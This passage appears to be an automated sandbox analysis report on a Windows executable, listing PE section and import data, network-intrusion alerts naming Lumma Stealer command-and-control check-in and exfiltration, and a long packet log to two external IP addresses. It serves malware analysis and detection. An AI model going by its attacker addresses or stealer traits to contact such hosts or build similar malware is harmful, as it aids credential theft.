                                                                                                      mov dword ptr [ebp-00000324h], eax
                                                                                                      call dword ptr [000000A8h]
                                                                                                      Programming Language:
                                                                                                      • [C++] VS2008 build 21022
                                                                                                      • [ASM] VS2008 build 21022
                                                                                                      • [ C ] VS2008 build 21022
                                                                                                      • [IMP] VS2005 build 50727
                                                                                                      • [RES] VS2008 build 21022
                                                                                                      • [LNK] VS2008 build 21022
                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x55a2c0x3c.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xc60000x200f0.rsrc
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x555b00x40.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x540000x188.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                      .text0x10000x5228b0x52400889c292408f37f44651fd2200fe7287aFalse0.8352547967325228data7.5387740552975195IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                      .rdata0x540000x23100x240037ce60af919346147d3c06e68d644d98False0.3646918402777778SysEx File -5.47836714696366IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .data0x570000x67f880x1800ad1aace9e58375a7127a42015776741eFalse0.3362630208333333data3.354623941213442IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                      .munil0xbf0000x53e50x4800f9debe3f07be68533bf0295e3d2ba68aFalse0.002224392361111111data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                      .farujub0xc50000x15a0x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                      .rsrc0xc60000x200f00x20200ad1a4fc387bdecd8597b3d16a6bfce8aFalse0.3955420111867704data4.860361337293481IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                      RT_CURSOR0xdd6000x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4276315789473684
                                                                                                      RT_CURSOR0xdd7480x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.7368421052631579
                                                                                                      RT_CURSOR0xdd8780x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.06130705394190871
                                                                                                      RT_CURSOR0xdfe480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.31023454157782515
                                                                                                      RT_ICON0xc6b700xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors0.829957356076759
                                                                                                      RT_ICON0xc7a180x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors0.8506317689530686
                                                                                                      RT_ICON0xc82c00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors0.820852534562212
                                                                                                      RT_ICON0xc89880x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors0.8432080924855492
                                                                                                      RT_ICON0xc8ef00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 92160.8013485477178424
                                                                                                      RT_ICON0xcb4980x988Device independent bitmap graphic, 24 x 48 x 32, image size 23040.8418032786885246
                                                                                                      RT_ICON0xcbe200x468Device independent bitmap graphic, 16 x 32 x 32, image size 10240.8625886524822695
                                                                                                      RT_ICON0xcc2f00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors0.3344882729211087
                                                                                                      RT_ICON0xcd1980x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors0.39666064981949456
                                                                                                      RT_ICON0xcda400x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors0.3888248847926267
                                                                                                      RT_ICON0xce1080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors0.3959537572254335
                                                                                                      RT_ICON0xce6700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.22136929460580912
                                                                                                      RT_ICON0xd0c180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.24765478424015008
                                                                                                      RT_ICON0xd1cc00x988Device independent bitmap graphic, 24 x 48 x 32, image size 24000.28114754098360656
                                                                                                      RT_ICON0xd26480x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.3120567375886525
                                                                                                      RT_ICON0xd2b280xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.3307569296375267
                                                                                                      RT_ICON0xd39d00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.4611913357400722
                                                                                                      RT_ICON0xd42780x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 00.5282258064516129
                                                                                                      RT_ICON0xd49400x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5469653179190751
                                                                                                      RT_ICON0xd4ea80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.3025328330206379
                                                                                                      RT_ICON0xd5f500x988Device independent bitmap graphic, 24 x 48 x 32, image size 00.3008196721311475
                                                                                                      RT_ICON0xd68d80x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.3528368794326241
                                                                                                      RT_ICON0xd6da80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.28171641791044777
                                                                                                      RT_ICON0xd7c500x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.36597472924187724
                                                                                                      RT_ICON0xd84f80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 00.3738479262672811
                                                                                                      RT_ICON0xd8bc00x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.36921965317919075
                                                                                                      RT_ICON0xd91280x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.2598547717842324
                                                                                                      RT_ICON0xdb6d00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.27790806754221387
                                                                                                      RT_ICON0xdc7780x988Device independent bitmap graphic, 24 x 48 x 32, image size 00.28524590163934427
                                                                                                      RT_ICON0xdd1000x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.32358156028368795
                                                                                                      RT_STRING0xe0ec00x4c4data0.44344262295081965
                                                                                                      RT_STRING0xe13880x15edata0.5114285714285715
                                                                                                      RT_STRING0xe14e80x7d4data0.4241516966067864
                                                                                                      RT_STRING0xe1cc00x7b0data0.42327235772357724
                                                                                                      RT_STRING0xe24700x5f8data0.4443717277486911
                                                                                                      RT_STRING0xe2a680x6b6data0.43364377182770664
                                                                                                      RT_STRING0xe31200x66adata0.438489646772229
                                                                                                      RT_STRING0xe37900x6fadata0.4316909294512878
                                                                                                      RT_STRING0xe3e900x754data0.4253731343283582
                                                                                                      RT_STRING0xe45e80x422data0.4735349716446125
                                                                                                      RT_STRING0xe4a100x668data0.4329268292682927
                                                                                                      RT_STRING0xe50780x80edata0.4146459747817653
                                                                                                      RT_STRING0xe58880x668data0.4274390243902439
                                                                                                      RT_STRING0xe5ef00x1fedata0.49411764705882355
                                                                                                      RT_ACCELERATOR0xdd5e00x20data1.15625
                                                                                                      RT_GROUP_CURSOR0xdd7300x14data1.15
                                                                                                      RT_GROUP_CURSOR0xdfe200x22data1.0588235294117647
                                                                                                      RT_GROUP_CURSOR0xe0cf00x14data1.25
                                                                                                      RT_GROUP_ICON0xcc2880x68data0.7115384615384616
                                                                                                      RT_GROUP_ICON0xdd5680x76data0.6779661016949152
                                                                                                      RT_GROUP_ICON0xd2ab00x76data0.6779661016949152
                                                                                                      RT_GROUP_ICON0xd6d400x68data0.7211538461538461
                                                                                                      RT_VERSION0xe0d080x1b4data0.573394495412844
                                                                                                      DLLImport
                                                                                                      KERNEL32.dllGetNumaNodeProcessorMask, SetDefaultCommConfigA, SearchPathW, SetThreadContext, DeleteTimerQueueEx, DebugActiveProcessStop, CreateProcessW, SetWaitableTimer, InterlockedIncrement, GetEnvironmentStringsW, InterlockedCompareExchange, GetComputerNameW, GetTimeFormatA, GetModuleHandleW, GetCurrentThread, GetDateFormatA, SetProcessPriorityBoost, GlobalAlloc, LoadLibraryW, GetConsoleAliasW, GetVolumePathNameA, GetStartupInfoW, GetStartupInfoA, SetLastError, GetProcAddress, GetLongPathNameA, GetAtomNameA, LoadLibraryA, UnhandledExceptionFilter, AddAtomA, FoldStringA, OpenFileMappingW, FindAtomW, FindFirstVolumeW, GetModuleHandleA, GetLastError, HeapReAlloc, HeapAlloc, GetCommandLineA, TerminateProcess, GetCurrentProcess, SetUnhandledExceptionFilter, IsDebuggerPresent, WriteFile, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, FlushFileBuffers, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapCreate, VirtualFree, HeapFree, VirtualAlloc, Sleep, ExitProcess, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, SetHandleCount, GetFileType, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, InterlockedDecrement, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, MultiByteToWideChar, SetStdHandle, InitializeCriticalSectionAndSpinCount, RtlUnwind, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, CreateFileA, CloseHandle, HeapSize, RaiseException
                                                                                                      USER32.dllGetProcessDefaultLayout
                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                      2025-01-09T08:34:11.448735+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449730104.21.56.70443TCP
                                                                                                      2025-01-09T08:34:13.220209+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449731176.113.115.1980TCP
                                                                                                      2025-01-09T08:34:15.334966+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449732104.21.48.1443TCP
                                                                                                      2025-01-09T08:34:15.694393+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449732104.21.48.1443TCP
                                                                                                      2025-01-09T08:34:15.694393+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449732104.21.48.1443TCP
                                                                                                      2025-01-09T08:34:16.443012+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449733104.21.48.1443TCP
                                                                                                      2025-01-09T08:34:16.927163+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449733104.21.48.1443TCP
                                                                                                      2025-01-09T08:34:16.927163+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449733104.21.48.1443TCP
                                                                                                      2025-01-09T08:34:17.646912+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449734104.21.48.1443TCP
                                                                                                      2025-01-09T08:34:18.278515+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449734104.21.48.1443TCP
                                                                                                      2025-01-09T08:34:19.151525+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449735104.21.48.1443TCP
                                                                                                      2025-01-09T08:34:20.375081+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449736104.21.48.1443TCP
                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Jan 9, 2025 08:34:10.454629898 CET49730443192.168.2.4104.21.56.70
                                                                                                      Jan 9, 2025 08:34:10.454678059 CET44349730104.21.56.70192.168.2.4
                                                                                                      Jan 9, 2025 08:34:10.454741001 CET49730443192.168.2.4104.21.56.70
                                                                                                      Jan 9, 2025 08:34:10.617249966 CET49730443192.168.2.4104.21.56.70
                                                                                                      Jan 9, 2025 08:34:10.617273092 CET44349730104.21.56.70192.168.2.4
                                                                                                      Jan 9, 2025 08:34:11.078125954 CET44349730104.21.56.70192.168.2.4
                                                                                                      Jan 9, 2025 08:34:11.078203917 CET49730443192.168.2.4104.21.56.70
                                                                                                      Jan 9, 2025 08:34:11.142251015 CET49730443192.168.2.4104.21.56.70
                                                                                                      Jan 9, 2025 08:34:11.142271042 CET44349730104.21.56.70192.168.2.4
                                                                                                      Jan 9, 2025 08:34:11.142626047 CET44349730104.21.56.70192.168.2.4
                                                                                                      Jan 9, 2025 08:34:11.142683029 CET49730443192.168.2.4104.21.56.70
                                                                                                      Jan 9, 2025 08:34:11.146836042 CET49730443192.168.2.4104.21.56.70
                                                                                                      Jan 9, 2025 08:34:11.187341928 CET44349730104.21.56.70192.168.2.4
                                                                                                      Jan 9, 2025 08:34:11.447710991 CET44349730104.21.56.70192.168.2.4
                                                                                                      Jan 9, 2025 08:34:11.447799921 CET44349730104.21.56.70192.168.2.4
                                                                                                      Jan 9, 2025 08:34:11.447844028 CET49730443192.168.2.4104.21.56.70
                                                                                                      Jan 9, 2025 08:34:11.447870970 CET49730443192.168.2.4104.21.56.70
                                                                                                      Jan 9, 2025 08:34:11.449645042 CET49730443192.168.2.4104.21.56.70
                                                                                                      Jan 9, 2025 08:34:11.449661016 CET44349730104.21.56.70192.168.2.4
                                                                                                      Jan 9, 2025 08:34:11.449673891 CET49730443192.168.2.4104.21.56.70
                                                                                                      Jan 9, 2025 08:34:11.449723959 CET49730443192.168.2.4104.21.56.70
                                                                                                      Jan 9, 2025 08:34:11.577646971 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:12.533078909 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:12.533226967 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:12.533467054 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:12.540779114 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.220058918 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.220074892 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.220082045 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.220138073 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.220149994 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.220208883 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.220263958 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.220266104 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.220278978 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.220293999 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.220304012 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.220304012 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.220316887 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.220345020 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.220362902 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.225172997 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.225198030 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.225203991 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.225265980 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.225594044 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.225636005 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.306320906 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.306437016 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.342128038 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.342143059 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.342155933 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.342186928 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.342216969 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.342323065 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.342335939 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.342346907 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.342360973 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.342361927 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.342405081 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.342431068 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.343020916 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.343033075 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.343045950 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.343060970 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.343075991 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.343099117 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.343333006 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.343384981 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.343406916 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.343413115 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.343421936 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.343426943 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.343446970 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.343447924 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.343480110 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.343501091 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.344199896 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.344243050 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.344254017 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.344269991 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.344294071 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.344295979 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.344309092 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.344333887 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.344362020 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.345042944 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.345093966 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.345103979 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.345117092 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.345144987 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.345158100 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.345165014 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.345171928 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.345201015 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.345227003 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.428333998 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.428390026 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.464004993 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.464051962 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.464063883 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.464076996 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.464103937 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.464193106 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.464230061 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.464231968 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.464242935 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.464263916 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.464278936 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.464318037 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.464329958 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.464343071 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.464354038 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.464366913 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.464382887 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.464428902 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.464441061 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.464464903 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.464507103 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.465014935 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.465070009 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.465070963 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.465082884 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.465095997 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.465131044 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.465150118 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.465197086 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.465209961 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.465241909 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.465701103 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.465719938 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.465732098 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.465744019 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.465749979 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.465758085 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.465761900 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.465775967 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.465790987 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.465806961 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.465832949 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.466372967 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.466384888 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.466397047 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.466413975 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.466439009 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.466490030 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.466501951 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.466511965 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.466530085 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.466532946 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.466563940 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.466588974 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.466594934 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.466644049 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.467339039 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.467350960 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.467364073 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.467380047 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.467381954 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.467401981 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.467412949 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.467425108 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.467427969 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.467442036 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.467469931 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.467519045 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.467617989 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.468163013 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.468188047 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.468199968 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.468200922 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.468225002 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.468242884 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.468245029 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.468256950 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.468285084 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.468451023 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.474419117 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.474445105 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.474455118 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.474466085 CET8049731176.113.115.19192.168.2.4
                                                                                                      Jan 9, 2025 08:34:13.474467039 CET4973180192.168.2.4176.113.115.19
                                                                                                      Jan 9, 2025 08:34:13.474489927 CET4973180192.168.2.4176.113.115.19
